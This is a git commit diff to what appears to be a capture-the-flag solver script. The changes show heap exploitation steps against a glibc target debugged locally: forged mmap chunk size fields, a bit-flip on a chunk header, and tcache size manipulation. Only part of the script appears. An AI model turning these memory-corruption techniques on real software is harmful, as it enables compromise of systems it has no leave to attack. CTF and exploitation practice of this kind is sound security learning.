commit d2d73f68c7b4ffdb3701fb43e2e533a8612cba72
parent 5427cf2925151b678e46e5d2e74c634c109bd11f
Author: Louis Burda <quent.burda@gmail.com>
Date: Sat, 27 Apr 2024 04:15:55 +0200
Stash
Diffstat:
1 file changed, 10 insertions(+), 11 deletions(-)
diff --git a/solve/solve b/solve/solve
@@ -94,7 +94,6 @@ gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir glibc" -ex "set de
+ ' -ex "target remote localhost:1025" -ex "b main" -ex "b exit" -ex "continue"'
run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
-dup = alloc(cc() * adj(small_size))
back = alloc(cc() * adj(small_size))
past = alloc(cc() * adj(small_size))
target = alloc(cc() * adj(small_size))
@@ -105,10 +104,6 @@ head = alloc(cc() * mmap_adj(mmap_size_1))
front = alloc(cc() * mmap_adj(mmap_size_1))
grid = [alloc(cc() * mmap_adj(mmap_size_1)) for _ in range(3)][::-1]
-embed()
-free(grid[0])
-free(dup)
-assert(dup == alloc(cc() * mmap_adj(mmap_size_1)))
list(map(free, grid))
free(front)
@@ -118,7 +113,7 @@ adjust = 0x5000
free(back)
back_map = {
mmap_size_3 - mmap_size_1 - 16: p64(0),
- mmap_size_3 - mmap_size_1 - 8: p64(adjust^0b010)
+ mmap_size_3 - mmap_size_1 - 8: p64((mmap_size_1+adjust)^0b010)
}
index = len(grid)-1
offset = mmap_size_1
@@ -141,13 +136,17 @@ for i in range(1, len(grid)):
free(target)
target = alloc(cc() * mmap_adj(mmap_size_3))
-free(past)
past = alloc(cc() * mmap_adj(mmap_size_3))
-# equivalent to grid 0
-edit(dup, flat({
- mmap_size_1 - (mmap_size_3 % mmap_size_1) - 8: p64(tcache_size^0b001)
-}, mmap_adj(mmap_size_1)))
+flip_size = 0x40000
+flip(grid[0], -8, flip_size)
+free(grid[0])
+
+#past = alloc(cc() * mmap_adj(mmap_size_3)))
+
+past = alloc(flat({
+ mmap_size_3 - mmap_size_2 - 8: p64(tcache_size^0b001)
+}, mmap_adj(mmap_size_3)))
free(target)
